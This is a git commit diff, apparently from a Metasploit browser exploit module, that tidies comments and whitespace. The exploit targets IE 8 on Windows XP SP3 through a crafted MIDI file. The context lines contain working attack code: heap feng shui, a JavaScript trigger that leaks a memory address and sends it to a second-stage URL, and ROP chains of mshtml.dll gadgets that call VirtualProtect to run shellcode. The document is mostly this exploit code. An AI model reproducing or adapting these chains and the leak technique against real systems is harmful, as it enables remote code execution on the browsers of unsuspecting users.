Final cleanup
parent
4c58991c89
commit
3c398d0e62
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
false, "MSHTML Build Version", '',
|
||||
[
|
||||
'',
|
||||
'', #Default (no leaky leaky)
|
||||
'8.0.6001.18702', #newly installed Win XP SP3 non patched
|
||||
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
|
||||
]
|
||||
|
@ -225,7 +225,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
m << [tc.length].pack('N')
|
||||
m << tc
|
||||
|
||||
|
||||
#midi_name = "test_case.mid"
|
||||
midi_name = rand_text_alpha(5) + ".mid"
|
||||
|
||||
|
@ -491,30 +490,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Redoing the feng shui if fails makes it reliable
|
||||
def js_trigger_fn_leak(my_target)
|
||||
|
||||
js_trigger = ""
|
||||
|
||||
if my_target.name == 'IE 8 on Windows XP SP3'
|
||||
js_trigger = <<-JSTRIGGER
|
||||
function trigger(){
|
||||
//alert('trying the trigger');
|
||||
var k = 999;
|
||||
while (k > 0) {
|
||||
if (typeof(clones[k].w1) == "string") {
|
||||
//alert('uaaa');
|
||||
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
|
||||
//alert(leak);
|
||||
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
|
||||
return;
|
||||
}
|
||||
k = k - 2;
|
||||
}
|
||||
//alert('retry');
|
||||
feng_shui();
|
||||
document.audio.Play();
|
||||
}
|
||||
JSTRIGGER
|
||||
|
||||
end
|
||||
|
||||
return js_trigger
|
||||
|
@ -569,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x4b601, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x33fbc6, # POP EAX # RETN [mshtml.dll]
|
||||
:nop,
|
||||
0x52c718, # PUSHAD # RETN [mshtml.dll]
|
||||
0x52c718 # PUSHAD # RETN [mshtml.dll]
|
||||
]
|
||||
|
||||
when 0xbf190
|
||||
|
@ -584,27 +576,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:junk,
|
||||
:junk,
|
||||
:junk,
|
||||
0x1318, #0x63581318, # ptr to &VirtualProtect() [IAT mshtml.dll]
|
||||
0x48b440, #0x63a0b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
|
||||
0x3dc745, #0x6395c745, # POP ESI # RETN [mshtml.dll]
|
||||
:neg, #0xffffffff
|
||||
0x2fb18b, #0x6387b18b, # INC ESI # RETN [mshtml.dll]
|
||||
0x35190d, #0x638d190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
|
||||
0x4aada7, #0x63a2ada7, # POP EBP # RETN [mshtml.dll]
|
||||
:junk, #Compensates RETN
|
||||
:junk, #Compensates RETN
|
||||
0x1ffc54, #0x6377fc54, # & jmp esp [mshtml.dll]
|
||||
0x4498a7, #0x639c98a7, # POP EBX # RETN [mshtml.dll]
|
||||
0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
|
||||
0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
|
||||
0x3dc745, # POP ESI # RETN [mshtml.dll]
|
||||
:neg, # 0xffffffff
|
||||
0x2fb18b, # INC ESI # RETN [mshtml.dll]
|
||||
0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
|
||||
0x4aada7, # POP EBP # RETN [mshtml.dll]
|
||||
:junk, # Compensates RETN
|
||||
:junk, # Compensates RETN
|
||||
0x1ffc54, # & jmp esp [mshtml.dll]
|
||||
0x4498a7, # POP EBX # RETN [mshtml.dll]
|
||||
:ebx, # 0x00000800: 0x00000201-> ebx
|
||||
0x24cce4, #0x637ccce4, # POP EDX # RETN [mshtml.dll]
|
||||
0x24cce4, # POP EDX # RETN [mshtml.dll]
|
||||
:edx, # 0x00000040-> edx
|
||||
0x158306, #0x636d8306, # POP ECX # RETN [mshtml.dll]
|
||||
0x535098, #0x63ab5098, # &Writable location [mshtml.dll]
|
||||
0x1cf217, #0x6374f217, # POP EDI # RETN [mshtml.dll]
|
||||
0xa0001, #0x63620001, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x349f9b, #0x638c9f9b, # POP EAX # RETN [mshtml.dll]
|
||||
:nop, #nop
|
||||
0x2afbe8 #0x6382fbe8, # PUSHAD # RETN [mshtml.dll]
|
||||
0x158306, # POP ECX # RETN [mshtml.dll]
|
||||
0x535098, # &Writable location [mshtml.dll]
|
||||
0x1cf217, # POP EDI # RETN [mshtml.dll]
|
||||
0xa0001, # RETN (ROP NOP) [mshtml.dll]
|
||||
0x349f9b, # POP EAX # RETN [mshtml.dll]
|
||||
:nop,
|
||||
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
|
||||
]
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue